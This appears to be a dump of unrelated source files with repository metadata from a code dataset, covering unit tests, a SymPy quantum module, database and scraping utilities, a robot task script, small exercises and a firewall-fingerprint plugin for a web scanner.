results = self.module.reconstruct(images=[cv2.imread('tests/test.jpg')], use_gpu=False, visualization=False)
self.assertIsInstance(results[0]['data'], np.ndarray)
def test_reconstruct3(self):
results = self.module.reconstruct(images=[cv2.imread('tests/test.jpg')], use_gpu=False, visualization=True)
self.assertIsInstance(results[0]['data'], np.ndarray)
def test_reconstruct4(self):
results = self.module.reconstruct(images=[cv2.imread('tests/test.jpg')], use_gpu=True, visualization=False)
self.assertIsInstance(results[0]['data'], np.ndarray)
def test_reconstruct5(self):
self.assertRaises(AssertionError, self.module.reconstruct, paths=['no.jpg'])
def test_reconstruct6(self):
self.assertRaises(AttributeError, self.module.reconstruct, images=['test.jpg'])
def test_save_inference_model(self):
self.module.save_inference_model('./inference/model')
self.assertTrue(os.path.exists('./inference/model.pdmodel'))
self.assertTrue(os.path.exists('./inference/model.pdiparams'))
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | PaddlePaddle.noreply@github.com |
c4a605613e91c76b4e0754596377aee10e660d64 | 0bde5f7f09aa537ed1f4828d4e5ebee66475918f | /h2o-py/tests/testdir_javapredict/pyunit_PUBDEV_5529_leaf_node_GBM_mojo.py | ff5a10ab4f881208f357c15af321fa6571aa912f | [
"Apache-2.0"
] | permissive | Winfredemalx54/h2o-3 | d69f1c07e1f5d2540cb0ce5e6073415fa0780d32 | dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7 | refs/heads/master | 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 | Apache-2.0 | 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null | UTF-8 | Python | false | false | 1,368 | py | from __future__ import print_function
import sys, os
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from random import randint
import tempfile
# This test will compare the leaf node assignment from model predict and mojo predict to make sure they
# agree for GBM models
def gbm_leaf_node_assignment_mojo_test():
problems = ['binomial', 'multinomial', 'regression']
PROBLEM = problems[randint(0, (len(problems) - 1))]
TESTROWS = 2000
df = pyunit_utils.random_dataset(PROBLEM, verbose=False, NTESTROWS=TESTROWS)
train = df[TESTROWS:, :]
test = df[:TESTROWS, :]
x = list(set(df.names) - {"respose"})
params = {'ntrees': 50, 'learn_rate': 0.1, 'max_depth': 4}
TMPDIR = tempfile.mkdtemp()
my_gbm = pyunit_utils.build_save_model_generic(params, x, train, "response", "gbm", TMPDIR)
MOJONAME = pyunit_utils.getMojoName(my_gbm._id)
h2o.download_csv(test[x], os.path.join(TMPDIR, 'in.csv')) # save test file, h2o predict/mojo use same file
pred_h2o, pred_mojo = pyunit_utils.mojo_predict(my_gbm, TMPDIR, MOJONAME, get_leaf_node_assignment=True) # load model and perform predict
pyunit_utils.compare_string_frames_local(pred_h2o, pred_mojo, 0.5)
if __name__ == "__main__":
pyunit_utils.standalone_test(gbm_leaf_node_assignment_mojo_test)
else:
gbm_leaf_node_assignment_mojo_test()
| [
"noreply@github.com"
] | Winfredemalx54.noreply@github.com |
fcce0ac9ce077ca870306df1518eb376c131cc13 | 00a9295409b78a53ce790f7ab44931939f42c0e0 | /FPGA/apio/iCEBreaker/FIR_Filter/sympy/venv/lib/python3.8/site-packages/sympy/physics/quantum/qapply.py | 6451c185e5e353dc5a7d4302c9ca73eb0c2093af | [
"Apache-2.0"
] | permissive | klei22/Tech-OnBoarding-Class | c21f0762d2d640d5e9cb124659cded5c865b32d4 | 960e962322c37be9117e0523641f8b582a2beceb | refs/heads/master | 2022-11-10T13:17:39.128342 | 2022-10-25T08:59:48 | 2022-10-25T08:59:48 | 172,292,871 | 2 | 3 | Apache-2.0 | 2019-05-19T00:26:32 | 2019-02-24T03:50:35 | C | UTF-8 | Python | false | false | 7,070 | py | """Logic for applying operators to states.
Todo:
* Sometimes the final result needs to be expanded, we should do this by hand.
"""
from __future__ import print_function, division
from sympy import Add, Mul, Pow, sympify, S
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.innerproduct import InnerProduct
from sympy.physics.quantum.operator import OuterProduct, Operator
from sympy.physics.quantum.state import State, KetBase, BraBase, Wavefunction
from sympy.physics.quantum.tensorproduct import TensorProduct
__all__ = [
'qapply'
]
#-----------------------------------------------------------------------------
# Main code
#-----------------------------------------------------------------------------
def qapply(e, **options):
"""Apply operators to states in a quantum expression.
Parameters
==========
e : Expr
The expression containing operators and states. This expression tree
will be walked to find operators acting on states symbolically.
options : dict
A dict of key/value pairs that determine how the operator actions
are carried out.
The following options are valid:
* ``dagger``: try to apply Dagger operators to the left
(default: False).
* ``ip_doit``: call ``.doit()`` in inner products when they are
encountered (default: True).
Returns
=======
e : Expr
The original expression, but with the operators applied to states.
Examples
========
>>> from sympy.physics.quantum import qapply, Ket, Bra
>>> b = Bra('b')
>>> k = Ket('k')
>>> A = k * b
>>> A
|k><b|
>>> qapply(A * b.dual / (b * b.dual))
|k>
>>> qapply(k.dual * A / (k.dual * k), dagger=True)
<b|
>>> qapply(k.dual * A / (k.dual * k))
<k|*|k><b|/<k|k>
"""
from sympy.physics.quantum.density import Density
dagger = options.get('dagger', False)
if e == 0:
return S.Zero
# This may be a bit aggressive but ensures that everything gets expanded
# to its simplest form before trying to apply operators. This includes
# things like (A+B+C)*|a> and A*(|a>+|b>) and all Commutators and
# TensorProducts. The only problem with this is that if we can't apply
# all the Operators, we have just expanded everything.
# TODO: don't expand the scalars in front of each Mul.
e = e.expand(commutator=True, tensorproduct=True)
# If we just have a raw ket, return it.
if isinstance(e, KetBase):
return e
# We have an Add(a, b, c, ...) and compute
# Add(qapply(a), qapply(b), ...)
elif isinstance(e, Add):
result = 0
for arg in e.args:
result += qapply(arg, **options)
return result.expand()
# For a Density operator call qapply on its state
elif isinstance(e, Density):
new_args = [(qapply(state, **options), prob) for (state,
prob) in e.args]
return Density(*new_args)
# For a raw TensorProduct, call qapply on its args.
elif isinstance(e, TensorProduct):
return TensorProduct(*[qapply(t, **options) for t in e.args])
# For a Pow, call qapply on its base.
elif isinstance(e, Pow):
return qapply(e.base, **options)**e.exp
# We have a Mul where there might be actual operators to apply to kets.
elif isinstance(e, Mul):
c_part, nc_part = e.args_cnc()
c_mul = Mul(*c_part)
nc_mul = Mul(*nc_part)
if isinstance(nc_mul, Mul):
result = c_mul*qapply_Mul(nc_mul, **options)
else:
result = c_mul*qapply(nc_mul, **options)
if result == e and dagger:
return Dagger(qapply_Mul(Dagger(e), **options))
else:
return result
# In all other cases (State, Operator, Pow, Commutator, InnerProduct,
# OuterProduct) we won't ever have operators to apply to kets.
else:
return e
def qapply_Mul(e, **options):
ip_doit = options.get('ip_doit', True)
args = list(e.args)
# If we only have 0 or 1 args, we have nothing to do and return.
if len(args) <= 1 or not isinstance(e, Mul):
return e
rhs = args.pop()
lhs = args.pop()
# Make sure we have two non-commutative objects before proceeding.
if (sympify(rhs).is_commutative and not isinstance(rhs, Wavefunction)) or \
(sympify(lhs).is_commutative and not isinstance(lhs, Wavefunction)):
return e
# For a Pow with an integer exponent, apply one of them and reduce the
# exponent by one.
if isinstance(lhs, Pow) and lhs.exp.is_Integer:
args.append(lhs.base**(lhs.exp - 1))
lhs = lhs.base
# Pull OuterProduct apart
if isinstance(lhs, OuterProduct):
args.append(lhs.ket)
lhs = lhs.bra
# Call .doit() on Commutator/AntiCommutator.
if isinstance(lhs, (Commutator, AntiCommutator)):
comm = lhs.doit()
if isinstance(comm, Add):
return qapply(
e.func(*(args + [comm.args[0], rhs])) +
e.func(*(args + [comm.args[1], rhs])),
**options
)
else:
return qapply(e.func(*args)*comm*rhs, **options)
# Apply tensor products of operators to states
if isinstance(lhs, TensorProduct) and all([isinstance(arg, (Operator, State, Mul, Pow)) or arg == 1 for arg in lhs.args]) and \
isinstance(rhs, TensorProduct) and all([isinstance(arg, (Operator, State, Mul, Pow)) or arg == 1 for arg in rhs.args]) and \
len(lhs.args) == len(rhs.args):
result = TensorProduct(*[qapply(lhs.args[n]*rhs.args[n], **options) for n in range(len(lhs.args))]).expand(tensorproduct=True)
return qapply_Mul(e.func(*args), **options)*result
# Now try to actually apply the operator and build an inner product.
try:
result = lhs._apply_operator(rhs, **options)
except (NotImplementedError, AttributeError):
try:
result = rhs._apply_operator(lhs, **options)
except (NotImplementedError, AttributeError):
if isinstance(lhs, BraBase) and isinstance(rhs, KetBase):
result = InnerProduct(lhs, rhs)
if ip_doit:
result = result.doit()
else:
result = None
# TODO: I may need to expand before returning the final result.
if result == 0:
return S.Zero
elif result is None:
if len(args) == 0:
# We had two args to begin with so args=[].
return e
else:
return qapply_Mul(e.func(*(args + [lhs])), **options)*rhs
elif isinstance(result, InnerProduct):
return result*qapply_Mul(e.func(*args), **options)
else: # result is a scalar times a Mul, Add or TensorProduct
return qapply(e.func(*args)*result, **options)
| [
"kaunalei@gmail.com"
] | kaunalei@gmail.com |
2a82d8b1e75cb8cc0f45a4059ea1ca39356f6b3a | 6ed01f4503fc9de234a561c945adff7cf4b1c81b | /ncar_lib/archon_db/archon_collection.py | 12c9bd72f0864de0c2c86d6575a12e1b0d505f2d | [] | no_license | ostwald/python-lib | b851943c913a68424a05ce3c7b42878ff9519f68 | 9acd97ffaa2f57b3e9e632e1b75016549beb29e5 | refs/heads/master | 2021-10-28T06:33:34.156095 | 2021-10-21T23:54:49 | 2021-10-21T23:54:49 | 69,060,616 | 0 | 1 | null | 2018-06-21T16:05:30 | 2016-09-23T21:04:46 | Roff | UTF-8 | Python | false | false | 3,326 | py | """
API - getCollection (archon_db_coll_id) - returns ArchonDBCollection instance
"""
import os, sys, re
# from mysql import GenericDB, TableRow
# import MySQLdb
from archonDB import ArchonDB
from mysql import TableRow
class ArchonDBCollection ():
"""
exposes the following from archon database
- collection (a TableRow instance) for collection record
- title
- items (list of TableRow instances)
"""
def __init__ (self, archon_db, coll_id):
self.db = archon_db
self.coll_id = coll_id
self.collection = self.getCollectionRec()
self.items = self.getContentItems()
self.title = self.collection and self.collection['Title'] or None
def getCollectionRec (self, schema=None):
table_name = 'tblCollections_Collections'
if schema is None:
schema = self.db.getSchema(table_name)
q_fields = '*'
else:
q_fields = ','.join(schema)
queryStr = """SELECT %s
FROM %s
WHERE ID=%s;""" % (q_fields, table_name, self.coll_id)
rows = self.db.doSelect (queryStr)
if len(rows) > 0:
return TableRow (rows[0], schema)
def getContentItems (self, schema=None):
"""
gets all content items for this collection as a list
of TableRow instances
"""
table_name = 'tblCollections_Content'
if schema is None:
schema = self.db.getSchema(table_name)
q_fields = '*'
else:
q_fields = ','.join(schema)
queryStr = """SELECT %s FROM %s
where CollectionId=%s;""" % (q_fields, table_name, self.coll_id)
rows = self.db.doSelect (queryStr)
results = []
for row in rows:
results.append (TableRow (row, schema))
return results
def getContentChildren (self, parent_id, schema=None):
"""
gets children items for given parent_id as a list
of TableRow instances
"""
table_name = 'tblCollections_Content'
if schema is None:
schema = self.db.getSchema(table_name)
q_fields = '*'
else:
q_fields = ','.join(schema)
queryStr = """SELECT %s FROM %s
WHERE CollectionId=%s AND ParentID=%s;""" % (q_fields, table_name, self.coll_id, parent_id)
rows = self.db.doSelect (queryStr)
results = []
for row in rows:
results.append (TableRow (row, schema))
return results
def getCollection (coll_id):
db = ArchonDB()
return ArchonDBCollection (db, coll_id)
def contentChildrenTester():
coll_id = 3
collection = getCollection (coll_id)
schema = ['ID','Title','ParentID']
parent_id = '0'
recs = collection.getContentChildren(parent_id, schema)
print '%d recs returned' % len(recs)
print recs[0]
def collectionContentTester():
coll_id = 3
collection = getCollection (coll_id)
schema = ['ID','Title','ParentID']
recs = collection.getContentItems(schema)
print '%d recs returned' % len(recs)
print recs[0]
def contentRecsTester():
coll_id = 3
collection = getCollection (coll_id)
schema = ['ID','Title','ParentID']
recs = db.getCollectionContent(coll_id, schema)
print '%d recs returned' % len(recs)
print recs[0]
def getCollectionRecTester():
coll_id = 3
collection = getCollection (coll_id)
schema = ['ID','CollectionIdentifier', 'Title']
rec = collection.getCollectionRec(schema)
print rec
if __name__ == "__main__":
# contentChildrenTester()
# collectionContentTester()
# getCollectionRecTester()
collection = getCollection(3)
print 'collection: ', collection.title
| [
"ostwald@ucar.edu"
] | ostwald@ucar.edu |
017aaf3026c55564f3912bd767f8a1a6adeef5a2 | 9322c270beaf1019328bf14c836d167145d45946 | /raoteh/sampler/_sample_mc0.py | b20d507908331f99b40855d708bc90835d53697a | [] | no_license | argriffing/raoteh | 13d198665a7a3968aad8d41ddad12c08d36d57b4 | cdc9cce8fdad0a79dbd90dfcdec6feece8fc931f | refs/heads/master | 2021-01-22T19:41:25.828133 | 2014-03-10T22:25:48 | 2014-03-10T22:25:48 | 10,087,018 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,229 | py | """
Sample Markov chain trajectories on trees.
Sample states using the observation data and constraints
only through a pre-computed sparse map, for each node, from a feasible state
to a subtree likelihood.
"""
from __future__ import division, print_function, absolute_import
import numpy as np
import networkx as nx
from raoteh.sampler import _util, _mc0
__all__ = []
def resample_states(T, root, node_to_pmap, root_distn=None, P_default=None):
"""
This function applies to a tree for which nodes will be assigned states.
Parameters
----------
T : undirected acyclic networkx graph
A tree whose edges are annotated with transition matrices P.
root : integer
The root node.
node_to_pmap : dict
A map from a node to a sparse map from a feasible state
to a subtree likelihood.
root_distn : dict, optional
A sparse finite distribution or weights over root states.
Values should be positive but are not required to sum to 1.
If the distribution is not provided,
then it will be assumed to have values of 1 for each possible state.
P_default : directed weighted networkx graph, optional
If an edge is not annotated with a transition matrix P,
then this default transition matrix will be used.
Returns
-------
node_to_sampled_state : dict
A map from each node of T to its state.
If the state was not defined by the node_to_state argument,
then the state will have been sampled.
"""
# Get the root pmap.
root_pmap = node_to_pmap[root]
# Try to compute the likelihood.
# This will raise an informative exception if no path is possible.
# If the likelihood is numerically zero then raise a different exception.
likelihood = _mc0.get_likelihood(root_pmap, root_distn=root_distn)
if likelihood <= 0:
raise _util.NumericalZeroProb(
'numerically intractably small likelihood: %s' % likelihood)
# Bookkeeping structure related to tree traversal.
predecessors = nx.dfs_predecessors(T, root)
# Sample the node states, beginning at the root.
node_to_sampled_state = {}
for node in nx.dfs_preorder_nodes(T, root):
# Get the precomputed pmap associated with the node.
# This is a sparse map from state to subtree likelihood.
pmap = node_to_pmap[node]
# Define a prior distribution.
if node == root:
prior = root_distn
else:
# Get the parent node and its state.
parent_node = predecessors[node]
parent_state = node_to_sampled_state[parent_node]
# Get the transition probability matrix.
P = T[parent_node][node].get('P', P_default)
# Get the distribution of a non-root node.
sinks = set(P[parent_state]) & set(pmap)
prior = dict((s, P[parent_state][s]['weight']) for s in sinks)
# Sample the state from the posterior distribution.
dpost = _util.get_unnormalized_dict_distn(pmap, prior)
node_to_sampled_state[node] = _util.dict_random_choice(dpost)
# Return the map of sampled states.
return node_to_sampled_state
| [
"argriffi@ncsu.edu"
] | argriffi@ncsu.edu |
35eddafba63d712b81976f456f86c8c65fe3bc42 | 547db7801930874bf8298304b7ae453695ab3751 | /zeabus_command/src/roulette.py | 156d25ede5bdc7f7e7b65b65f3a6b8b19e13ab04 | [] | no_license | skconan/zeabus2018 | 5fc764b5039799fa7d80f7e86345822b50282d2e | 16e2fc1a21daea813833f9afb89f64142b5b8682 | refs/heads/master | 2020-03-25T12:39:38.759263 | 2018-07-27T23:53:50 | 2018-07-27T23:53:50 | 143,786,404 | 0 | 1 | null | 2018-08-06T21:41:52 | 2018-08-06T21:41:52 | null | UTF-8 | Python | false | false | 4,412 | py | #!/usr/bin/python2.7
import rospy
import math as m
import constants as cons
from aicontrol import AIControl
from zeabus_vision.msg import vision_roulette
from zeabus_vision.srv import vision_srv_roulette
from std_msgs.msg import String
class roulette(object) :
def __init__(self) :
print '<===INIT BIN===>'
self.aicontrol = AIControl()
self.data = vision_roulette
rospy.wait_for_service('vision_roulette')
self.detect_roulette = rospy.ServiceProxy('vision_roulette',vision_srv_roulette)
self.center = 0
self.reset = 0
def detectBin(self, req) :
self.data = self.detect_roulette(String('roulette'), String('green'))
self.data = self.data.data
def pinger(self) :
self.data = self.pinger(String('roulette'))
self.data = self.data.data
def checkCenter(self) :
print 'checking'
auv = self.aicontrol
cx = self.data.cx
cy = self.data.cy
appear = self.data.appear
self.detectBin('green')
#check bin center
if appear :
if -cons.VISION_ROULETTE_ERROR <= cx <= cons.VISION_ROULETTE_ERROR and -cons.VISION_ROULETTE_ERROR <= cy <= cons.VISION_ROULETTE_ERROR :
self.center += 1
print 'center:%d'%center
else :
self.reset +=1
auv.multiMove([cx, cy, 0, 0, 0, 0])
#check center counter
if center >= 1:
print '<<<CHECK CENTER>>>'
return True
elif resetx >= 5:
centerx = 0
resetx = 0
def run(self) :
auv = self.aicontrol
print '<===DOING BIN===>'
mode = 1
count = 0
reset = 0
while not rospy.is_shutdown() and not mode == -1:
'''
if mode == 0 : #find pinger
print '<---mode 0--->'
self.pinger()
anglex = self.data.anglex
angley = self.data.angley
I = self.data.intensity
auv.ternRelative(anglex)
if not angley == m.pi/2 :
auv.move('forward', cons.AUV_H_SPEED)
auv.stop()
mode = 1
'''
if mode == 1 : #find green bin
print '<---mode 1--->'
auv.depthAbs(-2.5, 0.5)
self.detectBin('green')
appear = self.data.appear
if appear :
count += 1
reset = 0
print 'FOUND BIN: %d'%(count)
elif not appear:
reset += 1
print 'NOT FOUND BIN: %d'%(reset)
# check counter
if count >= 5:
count = 0
reset = 0
print 'let\'s to adjust->>>'
auv.stop()
mode = 2
elif reset >= 5:
reset = 0
count = 0
auv.move('forward', cons.AUV_M_SPEED)
if mode == 2 : #check bin
print '<---mode 2--->'
#############################
self.detectBin('green')
appear = self.data.appear
cx = self.data.cx
cy = self.data.cy
area = self.data.area
print '--------------------'
print 'cx:%f'%(cx)
print 'cy:%f'%(cy)
print 'appear: %s'%(appear)
print
#############################
if appear :
if self.checkCenter() :
if area >= 0.03 :
print 'let\'s it go!!!'
auv.stop()
mode = -1
elif area < 0.03 :
#auv.move('down', cons.AUV_M_SPEED)
auv.depthRelative(-0.5, 0.2)
auv.stop()
elif not appear :
#auv.move('down', cons.AUV_M_SPEED)
auv.depthRelative(0.1, 0.1)
auv.stop()
print 'Roulette completed'
if __name__=='__main__' :
rospy.init_node('roulette_node')
roulette = roulette()
roulette.run()
| [
"supakit.kr@gmail.com"
] | supakit.kr@gmail.com |
b1ad9418990788e4ac1dbab024f74de584c180ae | ccd30f827fb3bd4231c59d05e6d61c5963019291 | /practice/LeetCode/EverydayPrac/150.py | 9fc08e4de74ee5b184260c5912aad7db0eb8dada | [] | no_license | anthony20102101/Python_practice | d6709e7768baebaa248612e0795dd3e3fa0ae6ba | 56bb1335c86feafe2d3d82efe68b207c6aa32129 | refs/heads/master | 2023-06-10T18:49:11.619624 | 2021-06-27T15:36:10 | 2021-06-27T15:36:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,380 | py | # 523. Continuous Subarray Sum
# Given an integer array nums and an integer k, return true if nums has a continuous subarray of size at least two whose elements sum up to a multiple of k, or false otherwise.
#
# An integer x is a multiple of k if there exists an integer n such that x = n * k. 0 is always a multiple of k.
#
# Example 1:
#
# Input: nums = [23,2,4,6,7], k = 6
# Output: true
# Explanation: [2, 4] is a continuous subarray of size 2 whose elements sum up to 6.
#
# Example 2:
#
# Input: nums = [23,2,6,4,7], k = 6
# Output: true
# Explanation: [23, 2, 6, 4, 7] is an continuous subarray of size 5 whose elements sum up to 42.
# 42 is a multiple of 6 because 42 = 7 * 6 and 7 is an integer.
#
# Example 3:
#
# Input: nums = [23,2,6,4,7], k = 13
# Output: false
# 前缀和 + 哈希表
from typing import List
class Solution:
def checkSubarraySum(self, nums: List[int], k: int) -> bool:
modes = set()
presum = 0
for num in nums:
last = presum
# 当前前缀和
presum += num
presum %= k
# 同余定理
if presum in modes:
return True
# 上一个前缀和,下一个就可以用了(距离为2了)
modes.add(last)
return False
# 在 python 中 用字典 或者 set 来存储之前的和
nums = [23,2,6,4,7]
k = 6
| [
"492193947@qq.com"
] | 492193947@qq.com |
f0df2cc5b671215861961d2add55877278d159de | 42064191a5ac586ed088b293165b51abf16b1ee4 | /Data Wrangling with MongoDB/Lesson3/PS3.py | 91a40fe4cd4f84a34b1bf8e34b7f815fcc1f1823 | [] | no_license | ObinnaObeleagu/Udacity | 637cd458824a835febacebd72ebef77b30ca7f94 | 761ba413934f66cbd9429fd9882f59f047eb065b | refs/heads/master | 2023-03-15T23:27:23.022463 | 2019-01-03T04:05:03 | 2019-01-03T04:05:03 | 497,375,575 | 1 | 0 | null | 2022-05-28T16:46:12 | 2022-05-28T16:46:12 | null | UTF-8 | Python | false | false | 2,140 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
In this problem set you work with cities infobox data, audit it, come up with a cleaning idea and then clean it up.
Since in the previous quiz you made a decision on which value to keep for the "areaLand" field,
you now know what has to be done.
Finish the function fix_area(). It will receive a string as an input, and it has to return a float
representing the value of the area or None.
You have to change the function fix_area. You can use extra functions if you like, but changes to process_file
will not be taken into account.
The rest of the code is just an example on how this function can be used.
"""
import codecs
import csv
import json
import pprint
CITIES = 'cities.csv'
def fix_area(area):
# YOUR CODE HERE
if area == "NULL":
area = None
elif is_float(area):
area = float(area)
else:
area_parts = area.split("|")
first_area = area_parts[0][1:]
second_area = area_parts[1][:(len(area_parts[1])-1)]
if len(first_area.split(".")[1]) > len(second_area.split(".")[1]):
area = float(first_area)
else:
area = float(second_area)
return area
def is_float(s):
try:
float(s)
return True
except ValueError:
return False
def process_file(filename):
# CHANGES TO THIS FUNCTION WILL BE IGNORED WHEN YOU SUBMIT THE EXERCISE
data = []
with open(filename, "r") as f:
reader = csv.DictReader(f)
#skipping the extra matadata
for i in range(3):
l = reader.next()
# processing file
for line in reader:
# calling your function to fix the area value
if "areaLand" in line:
line["areaLand"] = fix_area(line["areaLand"])
data.append(line)
return data
def test():
data = process_file(CITIES)
print "Printing three example results:"
for n in range(5,8):
pprint.pprint(data[n]["areaLand"])
#assert data[8]["areaLand"] == 55166700.0
#assert data[3]["areaLand"] == None
if __name__ == "__main__":
test()
| [
"ryanzjlib@gmail.com"
] | ryanzjlib@gmail.com |
85e7ff6d8a4a5d8700d898024ad21483459573bc | 7f54637e347e5773dfbfded7b46b58b50544cfe5 | /7-3/chainxy/spiders/snipits.py | d97156f5c9e1759c9c1c3827989bfd035823b300 | [] | no_license | simba999/all-scrapy | 5cc26fd92b1d03366b74d4fff58c4a0641c85609 | d48aeb3c00fa2474153fbc8d131cf58402976e1d | refs/heads/master | 2021-01-25T14:24:04.715550 | 2018-03-03T13:43:13 | 2018-03-03T13:43:13 | 123,695,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,985 | py | import scrapy
import json
import os
from scrapy.spiders import Spider
from scrapy.http import FormRequest
from scrapy.http import Request
from chainxy.items import ChainItem
from lxml import etree
from selenium import webdriver
from lxml import html
import usaddress
class snipits(scrapy.Spider):
name = 'snipits'
domain = ''
history = []
def start_requests(self):
init_url = 'http://www.snipits.com/locations'
yield scrapy.Request(url=init_url, callback=self.body)
def body(self, response):
print("========= Checking.......")
store_list = response.xpath('//div[@class="loc-result"]//a/@href').extract()
for store in store_list:
yield scrapy.Request(url=store, callback=self.parse_page)
def parse_page(self, response):
try:
item = ChainItem()
detail = self.eliminate_space(response.xpath('//section[@id="hero"]//div[@class="one-third"]//p[1]//text()').extract())
item['address'] = detail[0]
if len(detail) == 4:
addr = detail[2].split(',')
item['phone_number'] = detail[3]
else :
addr = detail[1].split(',')
item['phone_number'] = detail[2]
item['city'] = self.validate(addr[0].strip())
item['state'] = self.validate(addr[1].strip().split(' ')[0].strip())
item['zip_code'] = self.validate(addr[1].strip().split(' ')[1].strip())
item['country'] = 'United States'
h_temp = ''
hour_list = self.eliminate_space(response.xpath('//section[@id="hero"]//div[@class="one-third"]//table//text()').extract())
cnt = 1
for hour in hour_list:
h_temp += hour
if cnt % 2 == 0:
h_temp += ', '
else:
h_temp += ' '
cnt += 1
item['store_hours'] = h_temp[:-2]
yield item
except:
pass
def validate(self, item):
try:
return item.encode('raw-unicode-escape').replace('\xa0', '').replace('\u2013', '').strip()
except:
return ''
def eliminate_space(self, items):
tmp = []
for item in items:
if self.validate(item) != '':
tmp.append(self.validate(item))
return tmp | [
"oliverking8985@yahoo.com"
] | oliverking8985@yahoo.com |
482e4bd3661237b354f821f1c4da2255cf34b7db | d01f71eadb5039f8cba9550cf12832add292cc50 | /labs/lab03/student/tests/q4a.py | 4fbb938c9f943c38af8d25a437262426ac831c36 | [] | no_license | essentialols/Spring2020 | 929208b08d5ff2e62347420cc02489f2857690cd | 2369fe6939e7bf2c30cccbeb6cdd040806e998ff | refs/heads/master | 2022-09-07T09:19:51.262662 | 2020-05-29T09:45:15 | 2020-05-29T09:45:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,734 | py | test = { 'hidden': False,
'name': 'q4a',
'points': 1,
'suites': [ { 'cases': [ { 'code': '>>> import matplotlib ;\n'
'>>> '
'np.alltrue(np.array([l.get_text() '
'for l in '
'ax_4a.xaxis.get_ticklabels()]) '
'== days)\n'
'True',
'hidden': False,
'locked': False},
{ 'code': '>>> bars = [rect.get_height() '
'for rect in '
'ax_4a.get_children() \n'
'... if '
'isinstance(rect, '
'matplotlib.patches.Rectangle) '
'and rect.get_x() != 0.0\n'
'... ];\n'
'>>> '
'np.allclose(np.array(bars)[-3:], '
'[1, 1, 2])\n'
'True',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
| [
"syoh@ucsb.edu"
] | syoh@ucsb.edu |
8aa9cf895f0bca3ee0e03003a7685af44fc89f17 | 263d6606dd72044b406b97e1a2e8cb16c4354c85 | /matrix.py | ebb111cc57474279d0ef225c7736d088813710e4 | [] | no_license | THABUULAGANATHAN/playerlevel | 6912ba792b128e36ff9ea4f15e508d3d442932ad | fe1813b25c94eb907df3fda63215b1755a8826fa | refs/heads/master | 2022-01-21T05:07:40.245217 | 2019-07-19T08:56:44 | 2019-07-19T08:56:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | ro1=int(input())
ro2=[]
for v in range(0,ro1):
ro2.append(list(map(int,input().split())))
z=0
k=0
for v in range(0,ro1):
for j in range(0,ro1):
if ro2[v][j]==1:
if v!=ro1-1 and ro2[v+1][j]==0:
z=z+1
if j!=ro1-1 and ro2[v][j+1]==0:
z=z+1
if v!=0 and ro2[v-1][j]==0:
z=z+1
if j!=0 and ro2[v][j-1]==0:
z=z+1
if v==0 and j==0 or v==ro1-1 and j==ro1-1 or v==0 and j==ro1-1 or v==ro1-1 and j==0 and z==2:
k=k+1
elif v==1 and j>0 and j<d-1 and z==3:
k=k+1
elif z==4:
k=k+1
z=0
print(k)
| [
"noreply@github.com"
] | THABUULAGANATHAN.noreply@github.com |
421011b0b2e0093abd8faf8e9f72af3f667b5198 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007.2/applications/games/Ri-li/actions.py | 44afdafc2bd786859cbf9f6858265c1469318ad0 | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2006 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure()
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("AUTHORS", "ChangeLog", "NEWS", "README", "COPYING")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
dc57bbab4ee8d0fcac00864f4c34d13d0c8f4260 | a0afcdcfcd0c139be8a975e8bd31692b43806922 | /__Concluir__/lendo_json/json_.py | 96385d65e11d16b897ddb19ffd0110868bc2468b | [] | no_license | luiz158/Dica_Python_Linkedin | f3b9b95e2929edbd1d49c51ad54e6f3ba2721913 | d92130ab70742bad983989ad0d7fbb542a854f1d | refs/heads/master | 2023-08-17T10:12:31.094026 | 2021-09-19T11:16:29 | 2021-09-19T11:16:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | import json
dados_json = '{"name": "Erickson", "age": 19, "city": "São Paulo"}'
carregar_dados = json.loads(dados_json)
print(carregar_dados['name'])
# Erickson
print(carregar_dados['age'])
# 19
| [
"ofc.erickson@gmail.com"
] | ofc.erickson@gmail.com |
6cda669b6a6658e279c87446ed23b98a68170333 | f47863b3a595cbe7ec1c02040e7214481e4f078a | /plugins/waf/blockdos.py | e6bb4d7aa13dc59305b9f57a9c5e9557c6578ebe | [] | no_license | gobiggo/0bscan | fe020b8f6f325292bda2b1fec25e3c49a431f373 | 281cf7c5c2181907e6863adde27bd3977b4a3474 | refs/heads/master | 2020-04-10T20:33:55.008835 | 2018-11-17T10:05:41 | 2018-11-17T10:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | import re
from config import HTTP_HEADER
__product__ = "BlockDos DDoS protection (BlockDos)"
def detect(content, **kwargs):
headers = kwargs.get("headers", None)
detection_schema = (
re.compile(r"blockdos\.net", re.I),
)
for detection in detection_schema:
if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
return True
| [
